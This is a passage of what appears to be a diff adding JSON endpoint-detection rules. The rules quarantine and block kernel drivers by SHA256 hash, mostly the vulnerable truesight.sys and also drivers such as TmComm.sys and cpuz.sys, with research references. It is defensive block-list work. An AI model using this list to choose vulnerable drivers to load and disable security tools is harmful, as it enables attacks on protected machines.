"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.491629Z", + "creation_date": "2026-03-23T11:45:31.491632Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.491640Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"0a5714bad41aae347b76b8ecc202d5ae92b3c19816b2bf3214fe613a4bdc9995", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "926a7831-82b0-59d6-8683-d5feb1113562", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.493198Z", + "creation_date": "2026-03-23T11:45:31.493201Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.493210Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "024831aba0bd668e0cdf8ec29eee4fcec329ff821b2baa38eda4915f4b9c0837", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "926cc190-8416-5aee-871a-544c57246f77", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.820980Z", + "creation_date": "2026-03-23T11:45:30.820983Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.820996Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "423f052690b6b523502931151dfcc63530e3bd9d79680f9b5ac033b23b5c6f18", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9275f722-0cd8-5907-a3b7-fec782a7edd7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.809622Z", + "creation_date": "2026-03-23T11:45:31.809625Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.809633Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e8fdda338b7f5232978e2a1cbe4b67be0130164dc7e548ee6e555e09aa917f24", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "927606ae-6753-5b07-9c4d-83aa79ce99d0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.823422Z", + "creation_date": "2026-03-23T11:45:30.823425Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.823434Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "98ebd924e01b6853307377855678ac6a64544ab3614eafff7b6f5df6ed3066ff", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "92763c03-2760-5d9c-80db-37bd8f8f4769", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.499135Z", + "creation_date": 
"2026-03-23T11:45:31.499138Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.499146Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "87881cfe09f0f5b5b1a2a1bee260c050940ab35df241099a404cc13a036b7b13", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "92933035-4108-59a6-9518-209e17bb6ab2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.974627Z", + "creation_date": "2026-03-23T11:45:29.974629Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.974634Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d74599ab8960f16e8026dcd564c5407956444c46c3dea6b38b1c243fbbbdc517", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"92959c3d-331a-5bea-8e28-bd75f3730f2a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.828991Z", + "creation_date": "2026-03-23T11:45:30.828993Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.828998Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b1fe6090645df9221ce904c212c5583d1eae6d20cf3292d0abeb4acbe16dbd9b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9299b33e-70d1-52c9-83a3-8b6565b34409", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.153202Z", + "creation_date": "2026-03-23T11:45:31.153205Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:31.153214Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5f575506837941d91025f94e839bd0b533b01dab253efea0c4a7f9fbd89e2958", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "92a1fd96-4d0c-5cb8-bd6b-dccee5941d96", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.143024Z", + "creation_date": "2026-03-23T11:45:31.143026Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.143031Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e08def1e56b5433b999448d4476a7496355cbfdac1a90bd8948bd8f237225f40", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "92a8c966-b8db-5336-a856-1d5906dfda2e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": 
"quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.493239Z", + "creation_date": "2026-03-23T11:45:31.493241Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.493247Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d08ae4dc2cac242c70820beca3c2977d8af9b8ea9e8611fe0488b9fc1159a415", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "92af07f2-e509-5484-9adc-217cdde7b514", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.458465Z", + "creation_date": "2026-03-23T11:45:30.458468Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.458477Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0f4ca9e9507724526f2b624d165750344473d388da38b7f3f6a8366dbc15140b", + "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "92bb21fb-6c71-541d-9f5b-177bd33bdaa6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.144353Z", + "creation_date": "2026-03-23T11:45:32.144355Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.144361Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "af5a2122b55ee9d8cd3dd49c4ac41bfc9b354912480f06fa7de19829c00c2720", + "comment": "Malicious Kernel Driver (aka idmtdi.sys) [https://www.loldrivers.io/drivers/c2e98102-2055-48f0-9449-3e7a7f2c0ffe/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "92bb419b-04db-5e2e-889e-3dc2c8e7cf0a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + 
"username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.479334Z", + "creation_date": "2026-03-23T11:45:31.479339Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.479349Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7f9f420e780b3d7a836c09eef910546389310d8bf1ccc7104f711b0430407c2d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "92c5369f-65df-5782-a9b4-ceccba8358dc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.830969Z", + "creation_date": "2026-03-23T11:45:30.830972Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.830981Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "efb1587c1b1ea61a10a68da83b386808102f29253a16339e10b6bfd9c69eaaee", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "92d2048f-b835-5883-aa6e-8cd362a2ecbd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.973432Z", + "creation_date": "2026-03-23T11:45:29.973434Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.973440Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fca10cde7d331b7f614118682d834d46125a65888e97bd9fda2df3f15797166c", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "92d3bbf8-8947-5dac-8f45-9917ccdb5106", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.481604Z", + "creation_date": 
"2026-03-23T11:45:30.481606Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.481612Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ba40b1fc798c2f78165e78997b4baf3d99858ee39a372ca6fbc303057793e50d", + "comment": "Vulnerable Kernel Driver (aka rtif.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "92deb819-4ef7-596b-8fc9-663a54848c4b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.828050Z", + "creation_date": "2026-03-23T11:45:31.828053Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.828061Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "84107d0c7ccd6f88aaa50f4c5185e33df14d16ebf874051c8c0d56ae4d653fb6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "92e7fc75-7718-527d-8a19-5c4a38ae1735", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.499082Z", + "creation_date": "2026-03-23T11:45:31.499085Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.499093Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "419e0a1e0ba3e06442a0076e289e11bfd2566aa1a818787b3231fd64d845d2b5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "92ec7335-c17a-5597-ac00-0f389d1137b8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.481776Z", + "creation_date": "2026-03-23T11:45:31.481780Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:31.481790Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "63a12cbb24bb2fa057b700fd2c59f24ce916c2124ca193b987e2079fa235c15c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9304882d-d209-51cc-ab16-8101699cb390", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.472842Z", + "creation_date": "2026-03-23T11:45:30.472845Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.472854Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2298e838e3c015aedfb83ab18194a2503fe5764a862c294c8b39c550aab2f08e", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "93049b59-d24d-51ac-9901-45f198e9be4a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.152364Z", + "creation_date": "2026-03-23T11:45:31.152367Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.152375Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "721ab9d65148c5f29f0bc716ce7bbf8159f268108201f50e552bf5ead290cbaf", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "931c31c7-03de-5107-9385-17fee16a6bdd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.472171Z", + "creation_date": "2026-03-23T11:45:31.472176Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.472185Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"b7d1d1058ebae552d0f030e059b61865d00e0a7227a42024d6e05b1f8b04657b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9321d471-67b6-5357-b93b-38cd0c5c6839", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.140319Z", + "creation_date": "2026-03-23T11:45:31.140323Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.140331Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ae4d56428c041fc6a35f79926f9792103042c41a2a64a334b6318d64430cf13c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "932bbe4c-1aaa-57fb-8eed-9fbcc8737645", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
